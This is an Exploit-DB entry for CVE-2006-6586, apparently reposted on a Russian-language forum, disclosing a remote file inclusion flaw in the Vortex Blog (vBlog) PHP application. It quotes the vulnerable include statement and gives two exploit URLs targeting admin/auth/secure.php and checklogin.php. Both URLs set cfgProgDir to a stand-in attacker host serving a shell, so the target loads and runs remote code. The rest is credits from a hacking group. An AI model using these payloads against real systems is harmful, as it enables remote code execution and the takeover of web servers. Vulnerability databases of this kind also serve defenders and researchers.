- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2740
- Проверка EDB
-
- Пройдено
- Автор
- DELTAHACKINGTEAM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-6586
- Дата публикации
- 2006-11-08
Код:
**********************************************************************************************************
WwW.Deltahacking.NeT (Priv8 Site)
WwW.Deltahacking.Ir (Public Site)
**********************************************************************************************************
* Portal Name :Vortex Blog AKA vBlog
* Class = Remote File Inclusion ;
* Download =http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip
* Found by = Dr.Pantagon ([email protected])
--------------------------------------------------------------------------------------------
--------------
- Vulnerable Code
include($cfgProgDir . "session.php");
++++++++++++++++++++++++++++++++++++++++++++
- Exploit:
http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?
--------------------------------------------------------------------------------------------
--------------
Special Thanks : Dr.Trojan , Hiv++ , D_7j , Lord
Special Thanks To Best My Friend : Tanha
**********************************************************************************************************
# milw0rm.com [2006-11-08]- Источник
- www.exploit-db.com
